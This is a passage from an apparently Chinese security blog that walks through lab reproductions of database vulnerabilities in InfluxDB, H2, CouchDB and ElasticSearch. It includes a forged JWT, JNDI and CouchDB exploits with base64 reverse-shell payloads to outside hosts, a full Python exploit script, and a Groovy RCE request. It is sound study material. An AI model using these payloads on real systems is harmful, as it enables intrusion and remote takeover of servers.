<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">my_bool <span class="title function_">check_scramble</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *scramble_arg, <span class="type">const</span> <span class="type">char</span> *message, <span class="type">const</span> ulong *hash_stage2)</span></span><br><span class="line">&#123;</span><br><span class="line">    ...</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">memcmp</span>(hash_stage2, hash_stage2_reassured, SHA1_HASH_SIZE * <span class="number">2</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这个函数在比较两个散列值时可能会因为处理器的优化方式和内存对齐问题导致预期外的结果。</p>
<h2 id="InfluxDB"><a href="#InfluxDB" class="headerlink" title="InfluxDB"></a>InfluxDB</h2><p>InfluxDB是一款时序数据库，其使用JWT作为鉴权方式。在其1.7.6版本以前，默认设置JWT的认证密钥shared-secret为空字符串，导致攻击者可以伪造任意用户身份在InfluxDB中执行SQL语句。漏洞原理是1.7.6之前的InfluxDB在services&#x2F;httpd&#x2F;handler.go中的身份验证函数中存在身份验证绕过漏洞，因为JWT令牌可能具有空的共享密钥（也被称为共享密钥）。</p>
<p>第一步：访问 <a target="_blank" rel="noopener" href="http://ip地址:8086/debug/vars">http://IP地址:8086/debug/vars</a> 查看能不能访问到系统的服务信息，如果能 则可能存在漏洞.（8086 是默认端口.）</p>
<img src="/.io//09/30/WebSecurity/database-security/image.png" class>
<p>第二步：访问 <a target="_blank" rel="noopener" href="http://ip地址:8086/query">http://IP地址:8086/query</a> 查看查询功能是否会有提示需要登录。</p>
<img src="/.io//09/30/WebSecurity/database-security/image-1.png" class>
<p>第三步：添加 POST 请求值.</p>
<img src="/.io//09/30/WebSecurity/database-security/image-2.png" class>
<p>第四步：访问 URL ，然后用 Burp 进行抓包，再发给 Repeater（重发器）</p>
<img src="/.io//09/30/WebSecurity/database-security/image-3.png" class>
<p>第五步：通过 JSON Web Tokens - jwt.io 生成所需要的 Token：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;alg&quot;</span><span class="punctuation">:</span> <span class="string">&quot;HS256&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;typ&quot;</span><span class="punctuation">:</span> <span class="string">&quot;JWT&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br><span class="line"> </span><br><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;username&quot;</span><span class="punctuation">:</span> <span class="string">&quot;admin&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;exp&quot;</span><span class="punctuation">:</span> <span class="number">3751718877</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>
<p>username需要已存在的用户才行，所以使用 admin 用户就好.exp是时间戳 ，这个时间戳一定要是未来的时间才行，这里生成了一个 2088 年的时间戳（所以我下面的Encoded值可以直接用）：3751718877： <a target="_blank" rel="noopener" href="https://www.beijing-time.org/shijianchuo">https://www.beijing-time.org/shijianchuo</a></p>
<img src="/.io//09/30/WebSecurity/database-security/image-4.png" class>
<p>第六步：在 Burp 抓包的数据包中添加 Authorization: Bearer (后面就是 Encoded 生成的值)【这个可以直接用，因为时间戳的结束是2088年】</p>
<img src="/.io//09/30/WebSecurity/database-security/image-5.png" class>
<p>第七步：如果要进行其他操作则修改 q&#x3D; 你想要查看的信息就行。<br>show users			# 显示用户<br>show databases		# 显示数据库<br>create database xxx	# 创建xxx数据库<br>drop database xxx	# 删除xxx数据库<br>create user influx with password ‘***’ with all privileges;	# 创建用户</p>
<img src="/.io//09/30/WebSecurity/database-security/image-6.png" class>

<h2 id="H2database-未授权访问"><a href="#H2database-未授权访问" class="headerlink" title="H2database 未授权访问"></a>H2database 未授权访问</h2><p>H2数据库是一个纯Java开发的关系型数据库管理系统（RDBMS），它支持SQL和JDBC标准，具有高性能、小巧、易于使用和部署等特点。同时，它还支持嵌入式、内存和分布式模式，可以满足不同场景的需求。</p>
<p>H2数据库的特点：<br>1.高性能：H2使用纯Java开发，在性能上比其他Java数据库更有优势，同时支持多种存储引擎，如内存、磁盘等。<br>2.小巧：H2的安装包非常小，可以轻松部署，也不需要安装复杂的数据库服务，只要安装JRE即可。<br>3.易于使用：H2具有简单易用的图形界面，支持丰富的标准SQL和JDBC接口，并提供详细的文档和示例，可以快速上手。<br>4.部署灵活：H2支持嵌入式、内存和分布式模式，可满足不同应用场景的需求，例如Web应用、桌面应用等。<br>H2数据库是一款小巧、高性能、易于使用和部署的Java数据库，非常适合中小型应用的开发和部署。</p>
<p>H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞，在v2.1.210+中修复。2.1.210 之前的H2控制台允许远程攻击者通过包含子字符串的jdbc:h2:mem JDBC URL执行任意代码。</p>
<p>漏洞复现：<br>访问http:&#x2F;&#x2F;虚拟机ip:8080&#x2F;h2-console&#x2F;<br>打开之后是一个访问的页面，我们需要用java语言驱动让这个网站主动访问其他主机并且执行命令，需要用到一开始写在最前面的工具进行生成rmi工具（<a target="_blank" rel="noopener" href="https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0%EF%BC%89%E5%9F%BA%E7%A1%80%E4%BD%BF%E7%94%A8%E6%96%B9%E6%B3%95%EF%BC%9A">https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0）基础使用方法：</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 命令 -A 攻击者的ip（监听者的ip，填你自己的）</span><br><span class="line">java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C &quot;bash -c &#123;echo,L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC84LjEzMC4xMDcuMTEvNTU2NiAwPiYx&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot; -A 8.130.107.11//学了大佬的反弹shell，但是一zhi失败</span><br><span class="line">java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A 192.168.43.156//这条成功了</span><br></pre></td></tr></table></figure>
<p>在驱动选择：javax.naming.InitialContext<br>url选择选择一个rmi填写<br>出现下方红色的字体就成功了，同时你的主机检测到了这个网站的访问</p>
<img src="/.io//09/30/WebSecurity/database-security/image-7.png" class>

<h2 id="CouchDB"><a href="#CouchDB" class="headerlink" title="CouchDB"></a>CouchDB</h2><p>CouchDB是一个完全包含web的数据库。使用JSON文档存储数据。通过HTTP使用web浏览器访问您的文档。使用JavaScript查询、合并和转换文档。CouchDB适用于现代网络和移动应用程序。Apache CouchDB是一个开源的面向文档的NoSQL数据库，用Erlang实现。CouchDB 使用多种格式和协议来存储、传输和处理其数据。它使用JSON来存储数据，使用MapReduce使用JavaScript作为查询语言，使用HTTP作为API。</p>
<h3 id="Couchdb-垂直权限绕过漏洞（CVE-2017-12635）"><a href="#Couchdb-垂直权限绕过漏洞（CVE-2017-12635）" class="headerlink" title="Couchdb 垂直权限绕过漏洞（CVE-2017-12635）"></a>Couchdb 垂直权限绕过漏洞（CVE-2017-12635）</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45300786/article/details/120287521">https://blog.csdn.net/qq_45300786/article/details/120287521</a><br>端口可能是5984，直接访问端口是couchdb,访问&#x2F;_utils目录，网站title是一个红色沙发，title名是Project Fauxton还可以看到couchdb图标</p>
<img src="/.io//09/30/WebSecurity/database-security/image-8.png" class>
<p>影响版本：小于 1.7.0 以及 小于 2.1.1，发送数据包：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">PUT /_users/org.couchdb.user<span class="punctuation">:</span>vulhub HTTP/<span class="number">1.1</span></span><br><span class="line">Host<span class="punctuation">:</span> <span class="number">192.168</span><span class="number">.100</span><span class="number">.34</span><span class="punctuation">:</span><span class="number">5984</span></span><br><span class="line">Accept<span class="punctuation">:</span> *<span class="comment">/*</span></span><br><span class="line"><span class="comment">Accept-Language: en</span></span><br><span class="line"><span class="comment">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span></span><br><span class="line"><span class="comment">Connection: close</span></span><br><span class="line"><span class="comment">Content-Type: application/json</span></span><br><span class="line"><span class="comment">Content-Length: 94</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">&#123;</span></span><br><span class="line"><span class="comment">  &quot;type&quot;: &quot;user&quot;,</span></span><br><span class="line"><span class="comment">  &quot;name&quot;: &quot;vulhub&quot;,</span></span><br><span class="line"><span class="comment">  &quot;roles&quot;: [&quot;_admin&quot;],</span></span><br><span class="line"><span class="comment">  &quot;password&quot;: &quot;vulhub&quot;</span></span><br><span class="line"><span class="comment">&#125;</span></span><br></pre></td></tr></table></figure>
<p>返回403错误：{“error”:”forbidden”,”reason”:”Only _admin may set roles”}，只有管理员才能设置Role角色：发送一次包含两个roles字段的数据包，即可绕过限制：<br>注意：1、roles字段必须为空，3、已创建的用户，你改密码的话，是不行的。</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">PUT /_users/org.couchdb.user<span class="punctuation">:</span>vulhub HTTP/<span class="number">1.1</span></span><br><span class="line">Host<span class="punctuation">:</span> <span class="number">192.168</span><span class="number">.100</span><span class="number">.34</span><span class="punctuation">:</span><span class="number">5984</span></span><br><span class="line">Accept<span class="punctuation">:</span> *<span class="comment">/*</span></span><br><span class="line"><span class="comment">Accept-Language: en</span></span><br><span class="line"><span class="comment">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span></span><br><span class="line"><span class="comment">Connection: close</span></span><br><span class="line"><span class="comment">Content-Type: application/json</span></span><br><span class="line"><span class="comment">Content-Length: 94</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">&#123;</span></span><br><span class="line"><span class="comment">  &quot;type&quot;: &quot;user&quot;,</span></span><br><span class="line"><span class="comment">  &quot;name&quot;: &quot;vulhub&quot;,</span></span><br><span class="line"><span class="comment">  &quot;roles&quot;: [&quot;_admin&quot;],</span></span><br><span class="line"><span class="comment">  &quot;roles&quot;: [],</span></span><br><span class="line"><span class="comment">  &quot;password&quot;: &quot;vulhub&quot;</span></span><br><span class="line"><span class="comment">&#125;</span></span><br></pre></td></tr></table></figure>
<p>输入我们之前创建的账号密码：vulhub:vulhub <a target="_blank" rel="noopener" href="http://xxxx:5984/_utils">http://xxxx:5984/_utils</a> 登录成功！ 同时即可看到user的数量多了1个</p>
<h3 id="Couchdb-任意命令执行-CVE-2017-12636"><a href="#Couchdb-任意命令执行-CVE-2017-12636" class="headerlink" title="Couchdb 任意命令执行 CVE-2017-12636"></a>Couchdb 任意命令执行 CVE-2017-12636</h3><p>影响版本：小于 1.7.0 以及 小于 2.1.1<br>该漏洞是需要登录用户方可触发，如果不知道目标管理员密码，可以利用<a target="_blank" rel="noopener" href="https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635">CVE-2017-12635</a>先增加一个管理员用户。<br>它允许已认证的用户在 CouchDB 服务器上执行任意命令。这个漏洞主要利用了 CouchDB 中的 <code>query_servers</code> 配置错误，这是 CouchDB 用于指定如何处理不同编程语言查询的设置。</p>
<p>1.6.0 下的说明<br>依次执行如下请求即可触发任意命令执行：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">curl -X PUT &#x27;http://vulhub:vulhub@your-ip:5984/_config/query_servers/cmd&#x27; -d &#x27;&quot;id &gt;/tmp/success&quot;&#x27;</span><br><span class="line">curl -X PUT &#x27;http://vulhub:vulhub@your-ip:5984/vultest&#x27;</span><br><span class="line">curl -X PUT &#x27;http://vulhub:vulhub@your-ip:5984/vultest/vul&#x27; -d &#x27;&#123;&quot;_id&quot;:&quot;770895a97726d5ca6d70a22173005c7b&quot;&#125;&#x27;</span><br><span class="line">curl -X POST &#x27;http://vulhub:vulhub@your-ip:5984/vultest/_temp_view?limit=10&#x27; -d &#x27;&#123;&quot;language&quot;:&quot;cmd&quot;,&quot;map&quot;:&quot;&quot;&#125;&#x27; -H &#x27;Content-Type:application/json&#x27;</span><br></pre></td></tr></table></figure>
<p>其中,<code>vulhub:vulhub</code>为管理员账号密码。<br>第一个请求是添加一个名字为<code>cmd</code>的<code>query_servers</code>，其值为<code>&quot;id &gt;/tmp/success&quot;</code>，这就是我们后面待执行的命令。<br>第二、三个请求是添加一个Database和Document，这里添加了后面才能查询。<br>第四个请求就是在这个Database里进行查询，因为我将language设置为<code>cmd</code>，这里就会用到我第一步里添加的名为<code>cmd</code>的<code>query_servers</code>，最后触发命令执行。</p>
<p>2.1.0 下的说明，2.1.0中修改了上面用到的两个API，这里需要详细说明一下。<br>Couchdb 2.x 引入了集群，所以修改配置的API需要增加node name。这个其实也简单，我们带上账号密码访问<code>/_membership</code>即可：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://vulhub:vulhub@your-ip:5984/_membership</span><br></pre></td></tr></table></figure>
<img src="/.io//09/30/WebSecurity/database-security/image-9.png" class>
<p>可见，我们这里只有一个node，名字是<code>nonode@nohost</code>。<br>然后，我们修改<code>nonode@nohost</code>的配置：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -X PUT http://vulhub:vulhub@your-ip:5984/_node/nonode@nohost/_config/query_servers/cmd -d &#x27;&quot;id &gt;/tmp/success&quot;&#x27;</span><br></pre></td></tr></table></figure>
<img src="/.io//09/30/WebSecurity/database-security/image-10.png" class>
<p>然后，与1.6.0的利用方式相同，我们先增加一个Database和一个Document：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl -X PUT &#x27;http://vulhub:vulhub@your-ip:5984/vultest&#x27;</span><br><span class="line">curl -X PUT &#x27;http://vulhub:vulhub@your-ip:5984/vultest/vul&#x27; -d &#x27;&#123;&quot;_id&quot;:&quot;770895a97726d5ca6d70a22173005c7b&quot;&#125;&#x27;</span><br></pre></td></tr></table></figure>
<p>Couchdb 2.x删除了<code>_temp_view</code>，所以我们为了触发<code>query_servers</code>中定义的命令，需要添加一个<code>_view</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -X PUT http://vulhub:vulhub@your-ip:5984/vultest/_design/vul -d &#x27;&#123;&quot;_id&quot;:&quot;_design/test&quot;,&quot;views&quot;:&#123;&quot;wooyun&quot;:&#123;&quot;map&quot;:&quot;&quot;&#125; &#125;,&quot;language&quot;:&quot;cmd&quot;&#125;&#x27; -H &quot;Content-Type: application/json&quot;</span><br></pre></td></tr></table></figure>
<p>增加<code>_view</code>的同时即触发了<code>query_servers</code>中的命令。</p>
<p>利用exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">from</span> requests.auth <span class="keyword">import</span> HTTPBasicAuth</span><br><span class="line"></span><br><span class="line">target = <span class="string">&#x27;http://your-ip:5984&#x27;</span></span><br><span class="line">command = <span class="string">rb&quot;&quot;&quot;sh -i &gt;&amp; /dev/tcp/10.0.0.1/443 0&gt;&amp;1&quot;&quot;&quot;</span></span><br><span class="line">version = <span class="number">1</span></span><br><span class="line"></span><br><span class="line">session = requests.session()</span><br><span class="line">session.headers = &#123;</span><br><span class="line">    <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/json&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment"># session.proxies = &#123;</span></span><br><span class="line"><span class="comment">#     &#x27;http&#x27;: &#x27;http://127.0.0.1:8085&#x27;</span></span><br><span class="line"><span class="comment"># &#125;</span></span><br><span class="line">session.put(target + <span class="string">&#x27;/_users/org.couchdb.user:wooyun&#x27;</span>, data=<span class="string">&#x27;&#x27;&#x27;&#123;</span></span><br><span class="line"><span class="string">  &quot;type&quot;: &quot;user&quot;,</span></span><br><span class="line"><span class="string">  &quot;name&quot;: &quot;wooyun&quot;,</span></span><br><span class="line"><span class="string">  &quot;roles&quot;: [&quot;_admin&quot;],</span></span><br><span class="line"><span class="string">  &quot;roles&quot;: [],</span></span><br><span class="line"><span class="string">  &quot;password&quot;: &quot;wooyun&quot;</span></span><br><span class="line"><span class="string">&#125;&#x27;&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line">session.auth = HTTPBasicAuth(<span class="string">&#x27;wooyun&#x27;</span>, <span class="string">&#x27;wooyun&#x27;</span>)</span><br><span class="line"></span><br><span class="line">command = <span class="string">&quot;bash -c &#x27;&#123;echo,%s&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&#x27;&quot;</span> % base64.b64encode(command).decode()</span><br><span class="line"><span class="keyword">if</span> version == <span class="number">1</span>:</span><br><span class="line">    session.put(target + (<span class="string">&#x27;/_config/query_servers/cmd&#x27;</span>), data=json.dumps(command))</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    host = session.get(target + <span class="string">&#x27;/_membership&#x27;</span>).json()[<span class="string">&#x27;all_nodes&#x27;</span>][<span class="number">0</span>]</span><br><span class="line">    session.put(target + <span class="string">&#x27;/_node/&#123;&#125;/_config/query_servers/cmd&#x27;</span>.<span class="built_in">format</span>(host), data=json.dumps(command))</span><br><span class="line"></span><br><span class="line">session.put(target + <span class="string">&#x27;/wooyun&#x27;</span>)</span><br><span class="line">session.put(target + <span class="string">&#x27;/wooyun/test&#x27;</span>, data=<span class="string">&#x27;&#123;&quot;_id&quot;: &quot;wooyuntest&quot;&#125;&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> version == <span class="number">1</span>:</span><br><span class="line">    session.post(target + <span class="string">&#x27;/wooyun/_temp_view?limit=10&#x27;</span>, data=<span class="string">&#x27;&#123;&quot;language&quot;:&quot;cmd&quot;,&quot;map&quot;:&quot;&quot;&#125;&#x27;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    session.put(target + <span class="string">&#x27;/wooyun/_design/test&#x27;</span>, data=<span class="string">&#x27;&#123;&quot;_id&quot;:&quot;_design/test&quot;,&quot;views&quot;:&#123;&quot;wooyun&quot;:&#123;&quot;map&quot;:&quot;&quot;&#125; &#125;,&quot;language&quot;:&quot;cmd&quot;&#125;&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p>具体来分析下上面的漏洞，可以总结为以下步骤：</p>
<h4 id="1-修改-query-servers-配置"><a href="#1-修改-query-servers-配置" class="headerlink" title="1. 修改 query_servers 配置"></a>1. 修改 <code>query_servers</code> 配置</h4><ul>
<li>攻击者首先将 <code>query_servers</code> 中用于处理命令的处理器（如 <code>cmd</code>）设置为执行任意命令的脚本或命令。例如，通过以下请求：<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -X PUT &#x27;http://username:password@your-ip:5984/_config/query_servers/cmd&#x27; -d &#x27;&quot;id &gt;/tmp/success&quot;&#x27;</span><br></pre></td></tr></table></figure>
这里，<code>username:password</code> 是已知的管理员凭据，<code>your-ip</code> 是目标 CouchDB 服务器的 IP 地址。</li>
</ul>
<h4 id="2-触发命令执行"><a href="#2-触发命令执行" class="headerlink" title="2. 触发命令执行"></a>2. 触发命令执行</h4><ul>
<li>然后，攻击者创建一个新的数据库和文档，为触发命令执行做准备。创建数据库和文档的请求不包含任何恶意代码，它们仅仅是为了后续的查询操作做准备。</li>
<li>最后，攻击者通过创建一个特殊的视图（在 CouchDB 2.x 中是 <code>_design</code> 文档）触发命令执行。视图的 <code>language</code> 属性被设置为 <code>cmd</code>，这告诉 CouchDB 使用 <code>cmd</code> 处理器来解释和执行视图的 Map 函数，而 Map 函数实际上是被配置为执行任意命令的脚本。</li>
</ul>
<h4 id="CouchDB-1-x-和-2-x-的区别"><a href="#CouchDB-1-x-和-2-x-的区别" class="headerlink" title="CouchDB 1.x 和 2.x 的区别"></a>CouchDB 1.x 和 2.x 的区别</h4><ul>
<li>在 CouchDB 2.x 中，由于引入了集群模式，修改配置的 API 需要包括节点名称。攻击者首先需要查询节点名称，然后针对特定节点修改 <code>query_servers</code> 配置。</li>
<li>CouchDB 2.x 中删除了 <code>_temp_view</code>，所以需要通过创建永久视图来触发命令执行。</li>
</ul>
<h2 id="ElasticSearch-文件写入-RCE-漏洞"><a href="#ElasticSearch-文件写入-RCE-漏洞" class="headerlink" title="ElasticSearch-文件写入&amp;RCE-漏洞"></a>ElasticSearch-文件写入&amp;RCE-漏洞</h2><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/cute-puli/p/15359890.html">https://www.cnblogs.com/cute-puli/p/15359890.html</a></p>
<p>1.5.x以前（其实跟CVE-2015-5531-ElasticSearch 目录穿越是差不多类型的漏洞，相当于是利用该漏洞来getshell吧）<br>访问存在的漏洞页面：（9200一般为ElasticSearch的常用端口），此漏洞环境需要与tomcat结合使用，发现8080端口存在tomcat默认配置页面。发现9200端口存在elasticsearch页面：</p>
<img src="/.io//09/30/WebSecurity/database-security/image-11.png" class>
<p>看到elasticSearch的版本为1.4.1猜测可能存在rce漏洞，打开burpsuite ，开启代理抓取数据包并把数据包并把数据包放到重放器中。</p>
<img src="/.io//09/30/WebSecurity/database-security/image-12.png" class>
<p>由于查询时至少要求ElasticSearch中有一条数据，所以替换如下数据：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">POST /website/blog/ HTTP/1.1</span><br><span class="line">Host: eci-2ze6p6jlhlj2syghya9p.cloudeci1.ichunqiu.com:9200</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 26</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">&quot;name&quot;: &quot;test&quot;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<img src="/.io//09/30/WebSecurity/database-security/image-13.png" class>
<p>利用反射机制执行JAVA代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">POST /_search?pretty HTTP/1.1</span><br><span class="line">Host: eci-2ze6p6jlhlj2syghya9p.cloudeci1.ichunqiu.com:9200</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application/text</span><br><span class="line">Content-Length: 500</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">&quot;size&quot;:1,</span><br><span class="line">&quot;script_fields&quot;: &#123;</span><br><span class="line">&quot;test#&quot;: &#123;</span><br><span class="line">&quot;script&quot;:&quot;java.lang.Math.class.forName(\&quot;java.io.BufferedReader\&quot;).getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\&quot;java.io.InputStreamReader\&quot;).getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\&quot;java.lang.Runtime\&quot;).getRuntime().exec(\&quot;cat /flag\&quot;).getInputStream())).readLines()&quot;,</span><br><span class="line">&quot;lang&quot;: &quot;groovy&quot;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<img src="/.io//09/30/WebSecurity/database-security/image-14.png" class>
<p>看到有加密过的文件猜测可能是base64编码，用burpsuite自带的解码工具尝试</p>
<img src="/.io//09/30/WebSecurity/database-security/image-15.png" class>



  </div>
</article>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/categories/">Categories</a></li>
        
          <li><a href="/idea/">Idea</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/g0dam">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A6%82%E5%86%B5"><span class="toc-number">1.</span> <span class="toc-text">概况</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Redis"><span class="toc-number">2.</span> <span class="toc-text">Redis</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE"><span class="toc-number">2.1.</span> <span class="toc-text">Redis未授权访问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE-CVE-2022-0543"><span class="toc-number">2.2.</span> <span class="toc-text">未授权访问-CVE-2022-0543</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Hadoop"><span class="toc-number">3.</span> <span class="toc-text">Hadoop</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Mysql"><span class="toc-number">4.</span> <span class="toc-text">Mysql</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2012-2122-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE"><span class="toc-number">4.1.</span> <span class="toc-text">CVE-2012-2122 未授权远程访问</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#InfluxDB"><span class="toc-number">5.</span> <span 